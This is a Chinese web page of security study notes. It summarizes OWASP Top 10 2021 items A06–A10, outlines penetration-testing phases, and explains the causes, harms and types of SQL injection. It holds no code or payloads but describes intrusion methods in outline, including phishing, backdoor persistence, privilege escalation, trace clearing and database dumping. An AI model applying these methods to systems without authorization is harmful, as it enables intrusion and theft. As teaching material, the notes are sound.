A06:2021-自帶缺陷和過(guò)時(shí)的組件 Vulnerable and Outdated Components | 如果滿足下面的某個(gè)條件,那么您的應(yīng)用就易受此類攻擊: * 如果您不知道所有使用的組件版本信息(包括:服務(wù)端和客戶端)。這包括了直接使用的組件或間接依賴的組件。 *如果軟件易受攻擊,不再支持或者過(guò)時(shí)。這包括:系統(tǒng)、Web服務(wù)器、應(yīng)用程序服務(wù)器、數(shù)據(jù)庫(kù)管理系統(tǒng)(DBMS)、應(yīng)用程序、API和所有的組件、運(yùn)行環(huán)境和庫(kù)。 * 如果您沒(méi)有定期做漏洞掃描和訂閱使用組件的安全公告。 * 如果您不基于風(fēng)險(xiǎn)及時(shí)修復(fù)或升級(jí)底層平臺(tái)、框架和依賴庫(kù)。很可能發(fā)生這種情況:根據(jù)變更控制,每月或每季度 進(jìn)行升級(jí),這使得組織在這段時(shí)間內(nèi)會(huì)受到已修復(fù)但未修補(bǔ)的漏洞的威脅。 * 如果軟件工程師沒(méi)有對(duì)更新的、升級(jí)的或打過(guò)補(bǔ)丁的組件進(jìn)行兼容性測(cè)試。 * 如果您沒(méi)有對(duì)組件進(jìn)行安全配置(參見(jiàn)“A05:2021–安全配置錯(cuò)誤”)。 |
A07:2021-身份識(shí)別和身份驗(yàn)證錯(cuò)誤 Identification and Authentication Failures | * 允許像是攻擊者已經(jīng)擁有有效用戶名稱和密碼列表的撞庫(kù)自動(dòng)化攻擊。 * 允許暴力或其他自動(dòng)化攻擊。 * 允許預(yù)設(shè)、脆弱、常見(jiàn)的密碼,像是"Password1"或"admin/admin"。 * 使用脆弱或無(wú)效的認(rèn)證資訊回復(fù)或忘記密碼的流程,如不安全的"知識(shí)相關(guān)問(wèn)答"。 * 使用明碼、被加密的或使用較脆弱雜湊法的密碼(參考A3: 2017-敏感性資料泄漏)。(TODO) * 不具有或是無(wú)效的多因素認(rèn)證。 * 于URL中泄漏會(huì)話(session) ID(如URL重寫(xiě))。 * 成功登入后沒(méi)有輪換會(huì)話(session) ID。 * 沒(méi) 有 正 確 的 注 銷 會(huì) 話 (session) ID 。 用 戶 的 會(huì) 話 (session) 或 認(rèn) 證 tokens( 主 要 是 單 一 登 入(SSO)token) 沒(méi)有在登出時(shí)或一段時(shí)間沒(méi)活動(dòng)時(shí)被適當(dāng)?shù)淖N。 |
A08:2021-軟件和數(shù)據(jù)完整性故障 Software and Data Integrity Failures | 軟件和數(shù)據(jù)完整性故障與無(wú)法防止違反完整性的代碼和基礎(chǔ)設(shè)施有關(guān)。這方面的一個(gè)例子是,應(yīng)用程序依賴于不受 信任的源、存儲(chǔ)庫(kù)和內(nèi)容分發(fā)網(wǎng)絡(luò)(CDN)的插件、庫(kù)或模塊。不安全的CI/CD管道可能會(huì)帶來(lái)未經(jīng)授權(quán)的訪問(wèn)、惡 意代碼或系統(tǒng)安全風(fēng)險(xiǎn)。最后,許多應(yīng)用程序現(xiàn)在包括自動(dòng)更新功能。其中,更新包在沒(méi)有進(jìn)行充足完整性驗(yàn)證的情 況下被下載,并應(yīng)用于以前受信任的應(yīng)用程序。攻擊者可能會(huì)上傳自己的更新包,以便在所有安裝上分發(fā)和運(yùn)行。另 一個(gè)例子是,對(duì)象或數(shù)據(jù)被編碼或序列化為攻擊者可以看到和修改的結(jié)構(gòu),很容易受到不安全的反序列化的影響。 |
A09:2021-安全日志和監(jiān)控故障 Security Logging and Monitoring Failures | 2021 年版OWASP Top 10 中,該類別是為了幫助檢測(cè)、升級(jí)和應(yīng)對(duì)活躍的違規(guī)行為。如果不進(jìn)行日志記錄和監(jiān) 測(cè),就無(wú)法發(fā)現(xiàn)違規(guī)行為。任何時(shí)候都會(huì)發(fā)生日志記錄、檢測(cè)、監(jiān)視和主動(dòng)響應(yīng)不足的情況: * 需要審計(jì)的事件,例如:登錄、失敗的登錄和高價(jià)值交易,但未記錄。 * 警告和錯(cuò)誤未生成日志或日志記錄不充分或日志消息不清晰。 * 應(yīng)用程序和 API的日志未進(jìn)行安全可疑活動(dòng)的監(jiān)控。 * 日志只存儲(chǔ)在本地。 * 適當(dāng)?shù)木瘓?bào)閾值和響應(yīng)升級(jí)過(guò)程不到位或無(wú)效。 * 滲透測(cè)試和動(dòng)態(tài)應(yīng)用安全測(cè)試(DAST)工具(例如:OWASP ZAP)的掃描沒(méi)有觸發(fā)警報(bào)。 * 應(yīng)用無(wú)法實(shí)時(shí)或接近實(shí)時(shí)地檢測(cè)、升級(jí)或或?qū)χ鲃?dòng)攻擊發(fā)出警報(bào)。 * 如果讓用戶或攻擊者看到日志和警報(bào)事件,您就容易受到信息泄露的攻擊(查看“A01:2021-失效的訪問(wèn)控 制”)。 |
A10:2021-服務(wù)端請(qǐng)求偽造 Server-Side Request Forgery | 一旦Web應(yīng)用在獲取遠(yuǎn)程資源時(shí)沒(méi)有驗(yàn)證用戶提供的URL,就會(huì)出現(xiàn)SSRF缺陷。它允許攻擊者強(qiáng)制應(yīng)用程序發(fā)送一個(gè)精心構(gòu)建的請(qǐng)求到一個(gè)意外目的地,即使是在有防火墻、VPN或其他類型的網(wǎng)絡(luò)訪問(wèn)控制列表(ACL)保護(hù)的情況下。隨著現(xiàn)代Web應(yīng)用為終端用戶提供便利的功能,獲取URL成為一種常見(jiàn)的場(chǎng)景。因此,SSRF安全攻擊事件也在不斷增加。此外,由于云服務(wù)和架構(gòu)的復(fù)雜性,SSRF的嚴(yán)重性也越來(lái)越高。 |
測(cè)試名稱 | 測(cè)試內(nèi)容 |
---|---|
范圍界定 | 在開(kāi)始技術(shù)性安全評(píng)估之前,務(wù)必要觀察研究目標(biāo)環(huán)境的被測(cè)范圍。同時(shí)還有了解,這個(gè)范圍牽扯幾個(gè)單位,是單個(gè)單位還是多個(gè)單位會(huì)參與到安全評(píng)估中來(lái)。 在范圍界定階段,需要考慮的典型因素如下: 測(cè)試對(duì)象是掃描? 應(yīng)采取何種測(cè)試方式? 有哪些在測(cè)試過(guò)程中需要滿足的條件? 需要多久才能完成測(cè)試? 此次測(cè)試應(yīng)達(dá)到什么樣的任務(wù)目標(biāo)? |
信息收集 | 在劃定了測(cè)試范圍后,就需要進(jìn)入信息收集階段,在這個(gè)階段,滲透測(cè)試人員需要利用各種資源盡可能的獲取測(cè)試目標(biāo)的相關(guān)信息。 從互聯(lián)網(wǎng)上收集信息的渠道主要有: 論壇 公告板 新聞組 媒體文章 博客 社交網(wǎng)絡(luò) 其他商業(yè)或非商業(yè)的網(wǎng)絡(luò) 此外,也可以借助各種搜索引擎獲取相關(guān)數(shù)據(jù),如谷歌、雅虎、百度等。搜集的信息主要包括DNS服務(wù)器、路由關(guān)系、whois數(shù)據(jù)庫(kù)、電子郵件地址、電話號(hào)碼、個(gè)人信息以及用戶賬戶,收集的信息越多,滲透測(cè)試成功的概率越高。 |
目標(biāo)識(shí)別 | 網(wǎng)絡(luò)拓?fù)浣Y(jié)構(gòu)關(guān)系和在線主機(jī)聯(lián)網(wǎng)設(shè)備與ID(IP地址) 這個(gè)階段的主要任務(wù)是識(shí)別目標(biāo)網(wǎng)絡(luò)的狀態(tài),操作系統(tǒng)和網(wǎng)絡(luò)架構(gòu),該階段工作旨在完整地展現(xiàn)目標(biāo)網(wǎng)絡(luò)里各種聯(lián)網(wǎng)設(shè)備或技術(shù)的完整關(guān)系,以幫助測(cè)試人員在接下來(lái)的工作里枚舉網(wǎng)絡(luò)里的各種服務(wù)。 |
服務(wù)枚舉 | 在線主機(jī)開(kāi)啟端口,并識(shí)別端口上運(yùn)行的服務(wù) 這一階段會(huì)根據(jù)前面各個(gè)階段的成果,進(jìn)一步找出目標(biāo)系統(tǒng)中所有開(kāi)放的端口。一但找到所有開(kāi)放端口,就可以通過(guò)這些端口來(lái)列出目標(biāo)系統(tǒng)上運(yùn)行的服務(wù),主機(jī)上開(kāi)發(fā)的端口都有相應(yīng)的服務(wù)程序。對(duì)這些信息進(jìn)行深度分析之后,可進(jìn)一步發(fā)掘目標(biāo)網(wǎng)絡(luò)基礎(chǔ)設(shè)施中可能存在的漏洞。 |
漏洞映射(漏洞掃描) | 已知漏洞/未知漏洞 可以根據(jù)以及發(fā)現(xiàn)的開(kāi)發(fā)端口和服務(wù)程序,查找和分析目標(biāo)系統(tǒng)中存在的漏洞,如果能采用自動(dòng)和手動(dòng)這兩種不同的測(cè)試方式結(jié)合起來(lái),審計(jì)人員對(duì)目標(biāo)系統(tǒng)的認(rèn)知會(huì)更為清晰,透徹,并能夠仔細(xì)的檢查已知漏洞和未知漏洞。 |
社會(huì)工程學(xué) | 安全策略、安全配置、安全行為都是企業(yè)員工在做。 如果目標(biāo)網(wǎng)絡(luò)沒(méi)有直接的入口,欺騙的藝術(shù)將起到拋磚引玉的作用,對(duì)目標(biāo)組織中的人員進(jìn)行定向攻擊,很有可能幫我們找到滲透目標(biāo)系統(tǒng)的入口。如,誘使用戶安裝帶有后門(mén)的惡意程序,就可能為審計(jì)人員的滲透工作形成突破,社會(huì)工程學(xué)滲透分為多種不同實(shí)現(xiàn)形式。偽裝成管理員,通過(guò)電話要求用戶提供自己的賬戶信息,并發(fā)送釣魚(yú)郵件來(lái)劫持用戶的賬戶信息,甚至誘使某人出現(xiàn)在某地—這些都是社會(huì)工程學(xué)攻擊。在社會(huì)工程學(xué)中,達(dá)成同一既定目標(biāo)的實(shí)現(xiàn)方式應(yīng)有盡有。需要主要的是,在對(duì)目標(biāo)實(shí)施欺騙以達(dá)到滲透目標(biāo)之前,多數(shù)情況下需要長(zhǎng)時(shí)間研究目標(biāo)人員的心理。另外,在開(kāi)展這個(gè)階段的工作之前,需要研究國(guó)內(nèi)的法律條文是否有關(guān)社會(huì)工程學(xué)的相關(guān)條款。 |
漏洞利用 | 在仔細(xì)檢查和發(fā)現(xiàn)目標(biāo)系統(tǒng)漏洞之后,就可以使用已有的漏洞利用程序?qū)δ繕?biāo)系統(tǒng)進(jìn)行滲透,審計(jì)人員可以把客戶端漏洞利用程序和社會(huì)工程學(xué)結(jié)合,進(jìn)而控制目標(biāo)系統(tǒng),這個(gè)階段的主要任務(wù)是控制目標(biāo)系統(tǒng),這個(gè)流程分為三步,涉及攻擊前,攻擊,攻擊后的相關(guān)行動(dòng)。 |
權(quán)限提升 | 提權(quán),普通用戶提升為管理員、系統(tǒng)用戶(獲得角色以外的權(quán)限) 獲取目標(biāo)系統(tǒng)的控制權(quán)是滲透成功的標(biāo)志,接下來(lái),審計(jì)人員就可以根據(jù)所擁有的訪問(wèn)權(quán)限在被測(cè)系統(tǒng)中資源發(fā)揮,審計(jì)人員也可以使用適用于目標(biāo)系統(tǒng)的本地漏洞來(lái)提升自己的權(quán)限,只要他們能在目標(biāo)系統(tǒng)上運(yùn)行提權(quán)漏洞利用程序,就可以獲取主機(jī)超級(jí)用戶權(quán)限或系統(tǒng)級(jí)權(quán)限。審計(jì)人員還可以以該主機(jī)為跳板,進(jìn)一步攻擊局域網(wǎng)絡(luò)。根據(jù)滲透范圍的界定,審計(jì)人員接下來(lái)開(kāi)展的攻擊可能受限制的,也可能不受限制。然后,他們很有可能以各種方式獲得與控制系統(tǒng)相關(guān)的更多信息。具體方法,可能會(huì)用嗅探手段截獲網(wǎng)絡(luò)數(shù)據(jù)包,破解各種服務(wù)密碼,,在局域網(wǎng)中使用網(wǎng)絡(luò)欺騙手段,所以說(shuō),提升權(quán)限的最終目的是獲取目標(biāo)網(wǎng)絡(luò)的最高訪問(wèn)權(quán)限。 |
訪問(wèn)維護(hù) | 權(quán)限維護(hù)(埋藏后面) 多數(shù)情況下,審計(jì)員需要在一段時(shí)間內(nèi)維護(hù)他們對(duì)目標(biāo)系統(tǒng)的訪問(wèn)權(quán)限。例如,在演示越權(quán)訪問(wèn)的時(shí)候,安全后門(mén)將節(jié)省重新滲透目標(biāo)所耗費(fèi)的大量時(shí)間。這種情況下,訪問(wèn)維護(hù)將節(jié)約獲取目標(biāo)系統(tǒng)訪問(wèn)權(quán)限所需要的時(shí)間、花費(fèi)和資源。審計(jì)員可以通過(guò)一些秘密的通信渠道,在既定的時(shí)間內(nèi)維護(hù)對(duì)目標(biāo)系統(tǒng)的訪問(wèn)權(quán)限。這些隧道往往基于特定協(xié)議、代理或點(diǎn)對(duì)點(diǎn)方法的后門(mén)程序。這種對(duì)系統(tǒng)的訪問(wèn)方法可以清楚的展示入侵人員在目標(biāo)系統(tǒng)實(shí)施攻擊時(shí)隱藏行蹤的具體方法 |
文檔報(bào)告 | 提交物,以人性化的方式說(shuō)滲透測(cè)試過(guò)程 滲透測(cè)試最后一個(gè)環(huán)節(jié),審計(jì)員要記錄報(bào)告并現(xiàn)場(chǎng)演示那些已經(jīng)識(shí)別驗(yàn)證和利用了的安全漏洞。在被測(cè)單位的管理和技術(shù)團(tuán)隊(duì)會(huì)檢查滲透使用的方法,并會(huì)根據(jù)這些文檔修復(fù)所有存在的漏洞。所以從道德角度來(lái)看,文檔報(bào)告的工作十分重要,并為了幫助管理人員 和技術(shù)人員共同理解分析當(dāng)前IT基礎(chǔ)框架中薄弱的環(huán)節(jié),可能需要給不同部門(mén)撰寫(xiě)不同措辭的書(shū)面報(bào)告。此外這些報(bào)告還可以用來(lái)獲取或比較滲透測(cè)試前后目標(biāo)系統(tǒng)的完整性。 簡(jiǎn)化的滲透測(cè)試流程是在進(jìn)行滲透測(cè)試過(guò)程中經(jīng)常使用的流程 具體如下: (1)明確目標(biāo) 確定范圍|確定規(guī)則|確定需求 (2)信息收集 基礎(chǔ)信息|系統(tǒng)信息|應(yīng)用信息|人員信息|防護(hù)信息 (3)漏洞探測(cè) 系統(tǒng)漏洞|Web 服務(wù)漏洞|Web 應(yīng)用漏洞|其他端口|通信安全 (4)漏洞驗(yàn)證 手工驗(yàn)證|工具驗(yàn)證|實(shí)驗(yàn)驗(yàn)證 (5)漏洞利用 定制EXP|防御繞過(guò)|進(jìn)一步滲透|清理痕跡 (6)形成報(bào)告 整理結(jié)果|補(bǔ)充介紹|修復(fù)建議 |
SQL 注入的攻擊行為可以描述為通過(guò)用戶可控參數(shù)中注入SQL 語(yǔ)法,破壞原有SQL 結(jié)構(gòu),達(dá)到編寫(xiě)程序時(shí)意料之外結(jié)果的攻擊行為。其成因可以歸結(jié)為以下兩個(gè)原因疊加造成的:程序員在處理程序和數(shù)據(jù)庫(kù)交互時(shí),使用字符串拼接的方式構(gòu)造SQL 語(yǔ)句。未對(duì)用戶可控參數(shù)進(jìn)行足夠的過(guò)濾,便將參數(shù)內(nèi)容拼接到SQL 語(yǔ)句中。
SQL 注入危害攻擊者可以利用SQL 注入漏洞,可以獲取數(shù)據(jù)庫(kù)中的多種信息(例如:后臺(tái)管理員賬密),從而脫取數(shù)據(jù)庫(kù)中的內(nèi)容(脫庫(kù))。在特別的情況下還可以插入內(nèi)容到數(shù)據(jù)庫(kù)、刪除數(shù)據(jù)庫(kù)中的內(nèi)容或者修改數(shù)據(jù)庫(kù)內(nèi)容。如果數(shù)據(jù)庫(kù)權(quán)限分配存在問(wèn)題,或者數(shù)據(jù)庫(kù)本身存在缺陷,攻擊者可以利用SQL 注入漏洞直接獲取WebShell 或者服務(wù)器權(quán)限。
SQL 注入漏洞的分類兩大基本類型 | 注入手法 | 提交參數(shù)的方式 | 注入點(diǎn)的位置 |
---|---|---|---|
聯(lián)合查詢 | GET 注入 | URL 注入 | |
數(shù)字型 | 報(bào)錯(cuò)注入 | POST 注入 | 搜索框注入 |
字符型 | 布爾盲注 | Cookie 注入 | 留言板注入 |
延時(shí)注入 | HTTP 頭部注入 | 登錄框注入 | |
堆疊查詢 |
關(guān)鍵詞:筆記
客戶&案例
營(yíng)銷資訊
關(guān)于我們
客戶&案例
營(yíng)銷資訊
關(guān)于我們
微信公眾號(hào)
版權(quán)所有? 億企邦 1997-2025 保留一切法律許可權(quán)利。